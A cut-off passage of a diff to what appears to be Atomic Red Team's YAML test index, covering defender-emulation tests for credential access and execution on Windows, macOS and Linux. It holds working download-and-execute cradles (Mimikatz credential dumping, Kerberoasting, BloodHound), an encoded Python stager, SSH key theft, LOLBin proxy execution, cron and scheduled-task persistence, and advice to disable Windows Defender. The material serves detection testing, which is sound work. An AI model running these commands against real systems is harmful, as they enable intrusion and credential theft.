|
|
source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)\nwhen
|
|
|
|
|
executed successfully , the test displays available services with their hashes.
|
|
|
|
|
\nIf the testing domain doesn't have any service principal name configured,
|
|
|
|
|
there is no output \n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
Import-Module .\Invoke-Kerberoast.ps1
|
|
|
|
|
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
|
|
|
|
|
Invoke-Kerberoast | fl
|
|
|
|
|
T1142:
|
|
|
|
|
technique:
|
|
|
|
@@ -21187,7 +21245,7 @@ credential-access:
|
|
|
|
|
description: 'Uses PowerShell to install and register a password filter DLL.
|
|
|
|
|
Requires a reboot and administrative privileges.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -21281,11 +21339,11 @@ credential-access:
|
|
|
|
|
dir c:\ /b /s .key | findstr /e .key
|
|
|
|
|
cleanup_command: 'del c:\Windows\cert.key >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Discover Private SSH Keys
|
|
|
|
|
description: 'Discover private SSH keys on a macOS or Linux system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -21303,7 +21361,7 @@ credential-access:
|
|
|
|
|
description: 'Copy private SSH keys on a Linux system to a staging folder using
|
|
|
|
|
the `cp` command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -21321,7 +21379,7 @@ credential-access:
|
|
|
|
|
description: 'Copy private SSH keys on a Linux or macOS system to a staging
|
|
|
|
|
folder using the `rsync` command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -21405,7 +21463,7 @@ execution:
|
|
|
|
|
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK''));\"
|
|
|
|
|
| python &""
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1191:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -21485,7 +21543,7 @@ execution:
|
|
|
|
|
description: 'Adversaries may supply CMSTP.exe with INF files infected with
|
|
|
|
|
malicious commands
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -21505,12 +21563,12 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmstp.exe /s #{inf_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: CMSTP Executing UAC Bypass
|
|
|
|
|
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
|
|
|
|
|
embedding them in the RunPreSetupCommandsSection of an INF file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -21530,7 +21588,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmstp.exe /s #{inf_file_uac} /au
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1059:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -21675,7 +21733,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hh.exe #{local_chm_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Compiled HTML Help Remote Payload
|
|
|
|
|
description: |
|
|
|
|
|
Uses hh.exe to execute a remote compiled HTML Help payload.
|
|
|
|
@@ -21692,7 +21750,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hh.exe #{remote_chm_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -21850,7 +21908,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'control.exe #{cpl_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1173:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -21930,7 +21988,7 @@ execution:
|
|
|
|
|
- name: Execute Commands
|
|
|
|
|
description: 'Executes commands via DDE using Microsfot Word
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -21952,7 +22010,7 @@ execution:
|
|
|
|
|
ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
|
|
|
|
|
and execute a powershell script
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -21960,7 +22018,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'start $PathToAtomicsFolder\T1173\bin\DDE_Document.docx
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1118:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -22018,7 +22076,7 @@ execution:
|
|
|
|
|
description: 'Executes the CheckIfInstallable class constructor runner instead
|
|
|
|
|
of executing InstallUtil.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22084,7 +22142,7 @@ execution:
|
|
|
|
|
description: 'Executes the InstallHelper class constructor runner instead of
|
|
|
|
|
executing InstallUtil.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22151,7 +22209,7 @@ execution:
|
|
|
|
|
- name: InstallUtil class constructor method call
|
|
|
|
|
description: 'Executes the installer assembly class constructor.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22218,7 +22276,7 @@ execution:
|
|
|
|
|
- name: InstallUtil Install method call
|
|
|
|
|
description: 'Executes the Install Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22285,7 +22343,7 @@ execution:
|
|
|
|
|
- name: InstallUtil Uninstall method call - /U variant
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22353,7 +22411,7 @@ execution:
|
|
|
|
|
variant
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22420,7 +22478,7 @@ execution:
|
|
|
|
|
- name: InstallUtil HelpText method call
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22488,7 +22546,7 @@ execution:
|
|
|
|
|
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
|
|
|
|
|
using a nonstandard extension for the assembly.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22605,14 +22663,14 @@ execution:
|
|
|
|
|
- name: Launchctl
|
|
|
|
|
description: 'Utilize launchctl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1168:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -22700,7 +22758,7 @@ execution:
|
|
|
|
|
of the referenced file. This technique was used by numerous IoT automated
|
|
|
|
|
exploitation attacks.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -22717,13 +22775,13 @@ execution:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Cron - Add script to cron folder
|
|
|
|
|
description: 'This test adds a script to a cron folder configured to execute
|
|
|
|
|
on a schedule. This technique was used by the threat actor Rocke during the
|
|
|
|
|
exploitation of Linux web servers.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -22740,7 +22798,7 @@ execution:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Event Monitor Daemon Persistence
|
|
|
|
|
description: "This test adds persistence via a plist to execute via the macOS
|
|
|
|
|
Event Monitor Daemon. \n"
|
|
|
|
@@ -22891,7 +22949,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta calls a local VBScript file to launch notepad.exe
|
|
|
|
|
description: Tests execution of a local program by a VBScript file called by
|
|
|
|
|
Mshta
|
|
|
|
@@ -22906,7 +22964,7 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""#{local_file_path}"")(window.close)")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta executes VBScript to execute malicious command
|
|
|
|
|
description: |
|
|
|
|
|
Run a local VB script to run local user enumeration powershell command
|
|
|
|
@@ -22919,7 +22977,7 @@ execution:
|
|
|
|
|
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
|
|
|
|
|
-noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta Executes Remote HTML Application (HTA)
|
|
|
|
|
description: |
|
|
|
|
|
Execute an arbitrary remote HTA.
|
|
|
|
@@ -22943,7 +23001,7 @@ execution:
|
|
|
|
|
mshta "#{temp_file}"
|
|
|
|
|
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1086:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -23037,7 +23095,7 @@ execution:
|
|
|
|
|
- name: Mimikatz
|
|
|
|
|
description: 'Download Mimikatz and dump credentials
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23051,7 +23109,7 @@ execution:
|
|
|
|
|
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
|
|
|
|
|
Invoke-Mimikatz -DumpCreds"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: BloodHound
|
|
|
|
|
description: "Upon execution BloodHound will be downloaded and executed. It
|
|
|
|
|
will set up collection methods, run,\n\nand then compress and store the data
|
|
|
|
@@ -23064,12 +23122,15 @@ execution:
|
|
|
|
|
type: url
|
|
|
|
|
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
|
|
|
|
|
Invoke-BloodHound"
|
|
|
|
|
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
|
|
|
|
|
Invoke-BloodHound
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item $env:temp\*BloodHound.zip -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Obfuscation Tests
|
|
|
|
|
description: |
|
|
|
|
|
Different obfuscated methods to test
|
|
|
|
@@ -23086,7 +23147,7 @@ execution:
|
|
|
|
|
- name: Mimikatz - Cradlecraft PsSendKeys
|
|
|
|
|
description: 'Run mimikatz via PsSendKeys
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -23118,11 +23179,11 @@ execution:
|
|
|
|
|
command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
|
|
|
|
|
Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell Add User
|
|
|
|
|
description: 'Using PS 5.1, add a user via CLI
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23148,7 +23209,7 @@ execution:
|
|
|
|
|
command: 'New-LocalUser -FullName ''#{full_name}'' -Name ''#{user_name}''
|
|
|
|
|
-Password #{password} -Description ''#{description}''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell MsXml COM object - no prompt
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23168,7 +23229,7 @@ execution:
|
|
|
|
|
-ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
|
|
|
|
|
$comMsXml.ResponseText"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell MsXml COM object - with prompt
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23188,7 +23249,7 @@ execution:
|
|
|
|
|
MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
|
|
|
|
|
$comMsXml.ResponseText"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell XML requests
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23207,7 +23268,7 @@ execution:
|
|
|
|
|
bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
|
|
|
|
|
| IEX"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell invoke mshta.exe download
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23224,7 +23285,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: '"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell Invoke-DownloadCradle
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23240,7 +23301,7 @@ execution:
|
|
|
|
|
description: 'Execution of a PowerShell payload from the Windows Registry similar
|
|
|
|
|
to that seen in fileless malware infections.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -23256,7 +23317,7 @@ execution:
|
|
|
|
|
- name: PowerShell Downgrade Attack
|
|
|
|
|
description: 'Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
dependencies:
|
|
|
|
@@ -23270,12 +23331,12 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: NTFS Alternate Data Stream Access
|
|
|
|
|
description: 'Creates a file with an alternate data stream and simulates executing
|
|
|
|
|
that hidden code/file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23297,7 +23358,7 @@ execution:
|
|
|
|
|
Invoke-Expression $streamcommand
|
|
|
|
|
cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1121:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -23359,9 +23420,10 @@ execution:
|
|
|
|
|
identifier: T1121
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Regasm Uninstall Method Call Test
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
|
|
|
|
|
execution, "I shouldn''t really execute either." will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23389,12 +23451,11 @@ execution:
|
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
|
|
|
|
|
cleanup_command: 'del #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvs Uninstall Method Call Test
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
|
|
|
|
|
SNK
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
|
|
|
|
|
along with other information about the assembly being installed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23500,9 +23561,9 @@ execution:
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Regsvr32 local COM scriptlet execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
OLE controls. Upon execution, calc.exe will be launched.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23522,12 +23583,11 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'regsvr32.exe /s /u /i:#{filename} scrobj.dll
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvr32 remote COM scriptlet execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
|
|
|
|
|
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23540,12 +23600,12 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvr32 local DLL execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
OLE controls. Upon execution, calc.exe will be launched.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23567,7 +23627,7 @@ execution:
|
|
|
|
|
command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
|
|
|
|
|
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1085:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -23628,9 +23688,10 @@ execution:
|
|
|
|
|
identifier: T1085
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Rundll32 execute JavaScript Remote Payload With GetObject
|
|
|
|
|
description: 'Test execution of a remote script using rundll32.exe
|
|
|
|
|
description: 'Test execution of a remote script using rundll32.exe. Upon execution
|
|
|
|
|
notepad.exe will be opened.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23643,7 +23704,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 execute VBscript command
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
|
|
|
|
@@ -23661,7 +23722,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 advpack.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with advpack.dll.
|
|
|
|
@@ -23686,7 +23747,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 ieadvpack.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with ieadvpack.dll.
|
|
|
|
@@ -23711,7 +23772,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 syssetup.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with syssetup.dll.
|
|
|
|
@@ -23737,7 +23798,7 @@ execution:
|
|
|
|
|
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
|
|
|
|
|
128 .\#{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 setupapi.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with setupapi.dll.
|
|
|
|
@@ -23763,7 +23824,7 @@ execution:
|
|
|
|
|
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
|
|
|
|
|
.\#{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1053:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -23868,7 +23929,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'at 13:20 /interactive cmd
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Local
|
|
|
|
|
description: "Upon successful execution, cmd.exe will create a scheduled task
|
|
|
|
|
to spawn cmd.exe at 20:10. \n"
|
|
|
|
@@ -23888,10 +23949,10 @@ execution:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Remote
|
|
|
|
|
description: "Create a task on a remote system.\n\nUpon successful execution,
|
|
|
|
|
cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote
|
|
|
|
@@ -23925,10 +23986,10 @@ execution:
|
|
|
|
|
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
|
|
|
|
|
